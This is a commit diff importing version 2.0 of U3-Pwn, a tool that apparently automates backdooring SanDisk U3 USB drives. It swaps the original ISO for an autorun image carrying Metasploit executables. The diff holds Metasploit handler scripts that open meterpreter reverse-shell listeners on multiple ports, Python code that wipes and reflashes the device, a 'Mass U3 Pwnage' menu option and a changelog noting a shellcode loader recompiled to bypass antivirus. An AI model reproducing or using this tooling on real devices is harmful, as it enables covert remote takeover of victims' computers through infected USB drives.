Commit 71bddaed authored by Mati's avatar Mati

Imported Upstream version 2.0

parent 017edb4d
......@@ -8,7 +8,7 @@
# U3-Pwn #
# #
# DATE #
# 06/27/2012 #
# 10/05/2013 #
# #
# DESCRIPTION #
# U3-Pwn is a tool designed to automate injecting executables to Sandisk #
......@@ -19,7 +19,7 @@
# REQUREMENTS #
# - Metasploit #
# - U3-Tool #
# - Python-2.6 #
# - Python-2.7 #
# #
# AUTHOR #
# Zy0d0x - http://www.nullsecurity.net/ #
......@@ -38,6 +38,8 @@ chmod 755 metasploit-latest-linux-installer.run
./metasploit-latest-linux-installer.run
ln -s /bin/mkisofs /bin/genisoimage
x64
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
......@@ -45,6 +47,10 @@ chmod 755 metasploit-latest-linux-x64-installer.run
./metasploit-latest-linux-x64-installer.run
ln -s /bin/mkisofs /bin/genisoimage
Kali Linux
Then cd U3-Pwn && python U3-pwn.py
apt-get update && apt-get -y install genisoimage
No preview for this file type
File mode changed from 100644 to 100755
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp_allports
set LHOST 0.0.0.0
exploit -j
set LPORT 2
exploit -j
\ No newline at end of file
use multi/handler
set payload windows/meterpreter/reverse_tcp_allports
set LPORT 1
set LHOST 0.0.0.0
exploit -j
set LPORT 2
exploit -j
set LPORT 3
exploit -j
set LPORT 4
exploit -j
use multi/handler
set payload windows/meterpreter/reverse_tcp_allports
set LPORT 1
set LHOST 0.0.0.0
exploit -j
set LPORT 2
exploit -j
set LPORT 3
exploit -j
set LPORT 4
exploit -j
exploit -j
set LPORT 5
exploit -j
set LPORT 6
exploit -j
File mode changed from 100644 to 100755
File mode changed from 100644 to 100755
#!/usr/bin/env python
# -*- coding: latin-1 -*- ######################################################
################################################################################
# ____ _ __ #
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
# /___/ team #
# #
# about.py #
# U3-Pwn #
# #
# DATE #
# 06/27/2012 #
# 10/05/2013 #
# #
# DESCRIPTION #
# U3-Pwn is a tool designed to automate injecting executables to Sandisk #
# smart usb devices with default U3 software install. This is performed by #
# smart usb devices with default U3 software install. This is performed by #
# removing the original iso file from the device and creating a new iso #
# with autorun features. #
# #
# REQUREMENTS #
# - Metasploit #
# - U3-Tool #
# - Python-2.6 #
# - Python-2.7 #
# #
# AUTHOR #
# Zy0d0x - http://www.nullsecurity.net/ #
# #
################################################################################
import os
import sys
import banner
try:
import os
import sys
import banner
except ImportError, error:
print'\n[-]Failed To Import Module\n'
print error
definepath = os.getcwd()
sys.path.append('%s/src/' % definepath)
banner.print_banner()
print '''
U3-Pwn is a tool designed to automate injecting executerbles to Sandisk
smart usb devices with default U3 software install. This is performed by
removing the original iso file from the device and creating a new iso
with autorun features.
U3-Pwn is a tool designed to automate injecting executerbles to Sandisk
smart usb devices with default U3 software install. This is performed by
removing the original iso file from the device and creating a new iso
with autorun features.
Written by: Michael Johnson (Zy0d0x) @ http://www.nullsecurity.net
Written by: Michael Johnson (Zy0d0x) @ http://www.nullsecurity.net
Submit Bugs:zy0d0x at nullsecurity.net
Submit Bugs:zy0d0x at nullsecurity.net
DISCLAIMER: This is only for testing purposes and can only be used where,
strict consent has been given. Do not use this for illegal purposes period.
DISCLAIMER: This is only for testing purposes and can only be used where,
strict consent has been given. Do not use this for illegal purposes period.
'''
raw_input(''' Press any key to return to menu: ''')
raw_input(''' Press any key to return to menu: ''')
This diff is collapsed.
......@@ -2,24 +2,25 @@
# -*- coding: utf-8 -*-
try:
import os
except ImportError:
pass
except ImportError, error:
print'\n[-]Failed To Import Module\n'
print error
def print_banner():
os.system('clear')
print '''
~ .__ \xc2\xb0.__ 0 o ^ .__ \xc2\xb0__ `\xc2\xb4
\xc2\xb0____) __ __| | | \xc2\xb0| ______\xc2\xb0____ 0 ____ __ _________|__|/ |_ ___.__.
/ \\| | \xc2\xb0\\ |\xc2\xb0| | \xc2\xb0/ ___// __ \\_/ ___\\| | \xc2\xb0\\_ __ \\ o\\ __< | |
| o\xc2\xb0| \\ | / |_| |__\\___ \\ ___/\\ \xc2\xb0\\___| o| /| | \\/ || |\xc2\xb0 \\___ O|
|___| /____/|____/____/____ \xc2\xb0>\\___ >\\___ >____/ |__|\xc2\xb0 |__||__| / ____|
`\xc2\xb4\xc2\xb4`\xc2\xb4\\/\xc2\xb4`nullsecurity team`\xc2\xb4\\/`\xc2\xb4\xc2\xb4`\xc2\xb4\\/`\xc2\xb4``\xc2\xb4\\/ ``\xc2\xb4```\xc2\xb4```\xc2\xb4\xc2\xb4\xc2\xb4\xc2\xb4`\xc2\xb4``0_o\\/\xc2\xb4\xc2\xb4`\xc2\xb4\xc2\xb4
~ .__ \xc2\xb0.__ 0 o ^ .__ \xc2\xb0__ `\xc2\xb4
\xc2\xb0____) __ __| | | \xc2\xb0| ______\xc2\xb0____ 0 ____ __ _________|__|/ |_ ___.__.
/ \\| | \xc2\xb0\\ |\xc2\xb0| | \xc2\xb0/ ___// __ \\_/ ___\\| | \xc2\xb0\\_ __ \\ o\\ __< | |
| o\xc2\xb0| \\ | / |_| |__\\___ \\ ___/\\ \xc2\xb0\\___| o| /| | \\/ || |\xc2\xb0 \\___ O|
|___| /____/|____/____/____ \xc2\xb0>\\___ >\\___ >____/ |__|\xc2\xb0 |__||__| / ____|
`\xc2\xb4\xc2\xb4`\xc2\xb4\\/\xc2\xb4`nullsecurity team`\xc2\xb4\\/`\xc2\xb4\xc2\xb4`\xc2\xb4\\/`\xc2\xb4``\xc2\xb4\\/ ``\xc2\xb4```\xc2\xb4```\xc2\xb4\xc2\xb4\xc2\xb4\xc2\xb4`\xc2\xb4``0_o\\/\xc2\xb4\xc2\xb4`\xc2\xb4\xc2\xb4
************************************************************************
U3-Pwn Metasploit Payload Injection Tool For SanDisk Devices
************************************************************************
************************************************************************
U3-Pwn Metasploit Payload Injection Tool For SanDisk Devices
************************************************************************
'''
try:
import banner
import os
import sys
except ImportError:
print'\n[-]Failed To Import Module'
definepath = os.getcwd()
sys.path.append('%s/src/' % definepath)
banner.print_banner()
print 'U3-Pwn Change Log'
print'''
===================================================================================
Rebult most of the tool, added more user imput sanitization (cheers Shadow Master)
Recompiled shellcodeexec to bypass av agian.
===================================================================================
'''
raw_input('Press Enter To Return To Menu..')
try:
import subprocess
import pexpect
import time
import os
import sys
import shutil
import banner
except ImportError:
pass
definepath = os.getcwd()
sys.path.append('%s/src/' % definepath)
devlist=[]
devices=[1]
banner.print_banner()
for num in devices:
dev = raw_input("\nEnter the device to change iso image on (example sdb1):")
devlist.append(str(dev))
try:
banner.print_banner()
#format and create a new partition on virtual cd partition using u3-tool
print '\nCreating partition of 8058880 bytes on /dev/%s ' % devlist[0]
child1 = pexpect.spawn('u3-tool -v -p 8058880 /dev/' + devlist[0])
#Accepts warning that the device will be formatted
#WARNING: Loading a new cd image causes the whole device to be whiped. This INCLUDES the data partition.
#I repeat: ANY EXCISTING DATA WILL BE LOST!
#Are you sure you want to continue? [yn]
child1.sendline('y')
time.sleep(2)
#inserts new iso file to virtual rom devices using u3-tool
banner.print_banner()
print '\nInserting new iso file to /dev/%s\n' % devlist[0]
subprocess.Popen('u3-tool -l "/home/zy0d0x/programming/u3-pwn/src/system.iso" /dev/%s' % (devlist[0]), shell=True).wait()
banner.print_banner()
print '\nSuccessfully backed up /dev/%s' % devlist[0]
time.sleep(2)
except Exception, error:
print '\n[-]Something went wrong, printing error message..'
print error
time.sleep(2)
sys.exit(0)
#!/usr/bin/env python
################################################################################
# ____ _ __ #
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
# /___/ team #
# #
# U3-Pwn #
# #
# DATE #
# 10/05/2013 #
# #
# DESCRIPTION #
# U3-Pwn is a tool designed to automate injecting executables to Sandisk #
# smart usb devices with default U3 software install. This is performed by #
# removing the original iso file from the device and creating a new iso #
# with autorun features. #
# #
# REQUREMENTS #
# - Metasploit #
# - U3-Tool #
# - Python-2.7 #
# #
# AUTHOR #
# Zy0d0x - http://www.nullsecurity.net/ #
# #
################################################################################
try:
import os
import sys
import banner
except ImportError, error:
print'\n[-]Failed To Import Module\n'
print error
definepath = os.getcwd()
sys.path.append('%s/src/' % definepath)
banner.print_banner()
print ' Compatibility List Of SanDisk U3 Devices'
print '''
VendorID | ProductID | Device Name
| |
0x0781 | 0x5406 | Sandisk Cruzer Micro
0x0781 | 0x5408 | Sandisk Cruzer Titanium
0x0781 | 0x550a | Sandisk Cruzer Pattern
0x0781 | 0x5151 | Sandisk Cruzer Micro Skin 8GB
0x0781 | 0x540e | Sandisk Cruzer Contour
0x0781 | 0x5530 | Sandisk Cruzer
0x0781 | 0x5535 | Sandisk Ultra Backup
'''
raw_input(' Press Enter To Return To Menu..')
This diff is collapsed.
#!/usr/bin/env python
# -*- coding: latin-1 -*- ######################################################
################################################################################
# ____ _ __ #
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
# /___/ team #
# #
# deviceinfo.py #
# U3-Pwn #
# #
# DATE #
# 06/27/2012 #
# 10/05/2013 #
# #
# DESCRIPTION #
# U3-Pwn is a tool designed to automate injecting executables to Sandisk #
# smart usb devices with default U3 software install. This is performed by #
# smart usb devices with default U3 software install. This is performed by #
# removing the original iso file from the device and creating a new iso #
# with autorun features. #
# #
# REQUREMENTS #
# - Metasploit #
# - U3-Tool #
# - Python-2.6 #
# - Python-2.7 #
# #
# AUTHOR #
# Zy0d0x - http://www.nullsecurity.net/ #
# #
################################################################################
try:
import subprocess
import pexpect
import time
import sys
import os
except ImportError:
pass
import sys
import shutil
import banner
except ImportError, error:
print'\n[-]Failed To Import Module\n'
print error
definepath = os.getcwd()
sys.path.append('%s/src/' % definepath)
import banner
try:
banner.print_banner()
device = \
raw_input('''\nEnter the device to find information about (example /dev/sde1): '''
)
if device == '':
print '''[-]Error No Device Found'''
time.sleep(2)
else:
subprocess.Popen('u3-tool -D ' + device, shell=True).wait()
sys.exit(0)
except KeyboardInterrupt:
print ' Detecting Device...\n'
u3 = ['5406', '5408', '5151', '5530', '5535', '550a', '540e']
vendorid = '0781:'
for id in u3:
try:
device = subprocess.check_output("lsusb -d %s%s" %(vendorid,id), shell=True)
print ' Device Found:', device
except Exception, error:
pass
time.sleep(2)
banner.print_banner()
print ' Detecting Partitions...'
time.sleep(2)
partitionsFile = open("/proc/partitions")
lines = partitionsFile.readlines()[2:]
for line in lines:
words = [x.strip() for x in line.split()]
minorNumber = int(words[1])
deviceName = words[3]
if minorNumber % 16 == 0:
path = "/sys/class/block/" + deviceName
if os.path.islink(path):
if os.path.realpath(path).find("/usb") > 0:
if deviceName.startswith("sd"):
print "\n Partition Found: /dev/%s1" % deviceName
time.sleep(2)
print '''[-]Keyboard Interrupt Detected, Returning To Menu....'''
except KeyboardInterrupt:
print'\n[-]Keyboard Interrupted Exiting'
time.sleep(2)
sys.exit(0)
except Exception, error:
print '''[-]Something went wrong, printing error message....'''
print '[-]Something went wrong, printing error message..'
print error
time.sleep(2)
sys.exit(0)
try:
dev = deviceName
banner.print_banner()
if dev.startswith('sda'):
print 'No Devices Found'
time.sleep(2)
else:
print '\n=================================\n'
print '\nDevice information for /dev/%s\n' % deviceName
print '\n=================================\n'
p = subprocess.Popen('u3-tool -D /dev/%s' % (deviceName),shell=True).wait()
raw_input('\nPress Enter To Continue..')
except Exception, error:
print '[-]Something went wrong, printing error message..'
print error
time.sleep(2)
sys.exit(0)
This diff is collapsed.
This diff is collapsed.
#!/usr/bin/env python
# -*- coding: latin-1 -*- ######################################################
################################################################################
# ____ _ __ #
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
# /___/ team #
# #
# U3-Pwn.py #
# U3-Pwn #
# #
# DATE #
# 06/27/2012 #
# 10/05/2013 #
# #
# DESCRIPTION #
# U3-Pwn is a tool designed to automate injecting executables to Sandisk #
# smart usb devices with default U3 software install. This is performed by #
# smart usb devices with default U3 software install. This is performed by #
# removing the original iso file from the device and creating a new iso #
# with autorun features. #
# #
# REQUREMENTS #
# - Metasploit #
# - U3-Tool #
# - Python-2.6 #
# - Python-2.7 #
# #
# AUTHOR #
# Zy0d0x - http://www.nullsecurity.net/ #
# #
################################################################################
try:
import subprocess
import time
......@@ -46,17 +45,17 @@ try:
banner.print_banner()
mainmenu = \
raw_input('''
U3-Pwn Main Menu:
U3-Pwn Main Menu:
1. Generate & Replace Iso Image.
2. Generate & Replace With Custom Exe.
3. Mass U3 Pwnage - Multi device attack.
4. Find Out U3 SanDisk Device Information.
5. Replace Iso Image With Original U3 Iso.
6. About U3-Pwn & Disclaimer.
7. Exit U3-Pwn.
1. Generate & Replace Iso Image.
2. Generate & Replace With Custom Exe.
3. Find Out U3 SanDisk Device Information.
4. Replace Iso Image With Original U3 Iso.
5. SanDisk Usb Compatibility List.
6. About U3-Pwn & Disclaimer.
7. Exit U3-Pwn.
Enter the number: ''')
Enter the number: ''').strip()
# Generate Single Iso & Replace Iso on SanDisk Device
......@@ -86,52 +85,50 @@ try:
print '''[-]Returning to previous menu...'''
time.sleep(2)
# Generate Single Iso & Replace Iso on Multiple SanDisk Device
# Get SanDisk Device Information
if mainmenu == '3':
try:
sys.path.append('%s/src/' % definepath)
try:
reload(masspwnage)
reload(deviceinfo)
except Exception:
pass
import masspwnage
import deviceinfo
except KeyboardInterrupt:
print '''[-]Returning to previous menu...'''
time.sleep(2)
# Get SanDisk Device Information
# Replace Backdoored SanDisk Device With Original Iso File
if mainmenu == '4':
try:
sys.path.append('%s/src/' % definepath)
try:
reload(deviceinfo)
reload(backup)
except Exception:
pass
import deviceinfo
import backup
except KeyboardInterrupt:
print '''[-]Returning to previous menu...'''
time.sleep(2)
# Replace Backdoored SanDisk Device With Original Iso File
# About & Disclaimer
if mainmenu == '5':
try:
sys.path.append('%s/src/' % definepath)
sys.path.append('%s/src/' % definepath)
try:
reload(backup)
reload(compat)
except Exception:
pass
import backup
import compat
except KeyboardInterrupt:
print '''[-]Returning to previous menu...'''
time.sleep(2)
# About & Disclaimer
if mainmenu == '6':
if mainmenu == '6':
try:
sys.path.append('%s/src/' % definepath)
try:
reload(about)
except Exception:
......@@ -140,6 +137,7 @@ try:
print '''[-]Returning to previous menu...'''
time.sleep(2)
if mainmenu == '7':
sys.exit()
except KeyboardInterrupt:
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment